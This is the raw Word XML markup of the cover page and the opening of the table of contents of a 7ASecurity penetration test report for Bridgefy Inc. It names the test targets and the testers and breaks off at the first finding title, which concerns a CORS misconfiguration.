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word/header1.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Default Extension="png" ContentType="image/png"/>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40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="15729152">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3257550" cy="10058400"/>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3257550" cy="10058400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w: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spacing w:before="407"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="295" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="3801" w:right="2112" w:hanging="22"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="341B74"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Test Targets: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Apps Bridgefy SDK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="426" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="3801" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Servers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="69"/>
        <w:ind w:left="3801" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Cloud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Infrastructure Bridgefy Processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="3801" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Privacy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="341B74"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="403"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1B4586"/>
        </w:rPr>
        <w:t>Pentest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1B4586"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="25"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487587840">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3352800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>177618</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3467100" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="2" name="Graphic 2"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="2" name="Graphic 2"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3467100" cy="1270"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="3467100" h="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3467100" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="12699">
                          <a:solidFill>
                            <a:srgbClr val="878787"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:prstTxWarp prst="textNoShape">
                          <a:avLst/>
                        </a:prstTxWarp>
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape style="position:absolute;margin-left:264pt;margin-top:13.985684pt;width:273pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15728640;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape1" coordorigin="5280,280" coordsize="5460,0" path="m5280,280l10740,280e" filled="false" stroked="true" strokeweight=".999998pt" strokecolor="#878787">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="3780" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="073762"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Client:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="62"/>
        <w:ind w:left="3780" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="073762"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Bridgefy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="073762"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Inc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="353"/>
        <w:ind w:left="3780"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Team:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="4319" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="4319" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Abraham</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Aranguren,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MSc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="4319" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="4319" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dariusz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Jastrzębski</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="4319" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="4319" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Michał</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Rzepka,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MSc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="4319" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="4319" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Miroslav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Štampar,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PhD.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="4319" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="4319" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Óscar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Martínez,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MSc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="4319" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="37" w:after="0"/>
        <w:ind w:left="4319" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Szymon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Grzybowski,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MSc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="4319" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="4319" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tarunkant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Gupta,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>BTech.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="114"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="3864" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="20124D"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>7ASecurity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="62"/>
        <w:ind w:left="5252" w:right="1385" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="20124D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Protect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="20124D"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="20124D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="20124D"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="20124D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="20124D"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="20124D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="20124D"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="20124D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Apps From Attackers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="261" w:lineRule="exact"/>
        <w:ind w:left="3864"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Century Gothic"/>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:w w:val="105"/>
          </w:rPr>
          <w:t>sales@7asecurity.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="47"/>
        <w:ind w:left="3864"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>7asecurity.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="0" w:bottom="0" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="144"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>INDEX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId8"/>
          <w:footerReference w:type="default" r:id="rId9"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1351" w:top="1780" w:bottom="1653" w:left="1440" w:right="1080"/>
          <w:pgNumType w:start="2"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:pos="9231" w:val="left" w:leader="none"/>
            </w:tabs>
            <w:spacing w:before="413"/>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250054">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:pos="9231" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250053">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:pos="9231" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250052">
            <w:r>
              <w:rPr/>
              <w:t>Identified</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Vulnerabilities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9231" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250051">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-004</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP2/3:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Impersonation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>2FA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>bypass</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>CORS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Misconfig</w:t>
            </w:r>
            <w:r>
              <w:rPr>
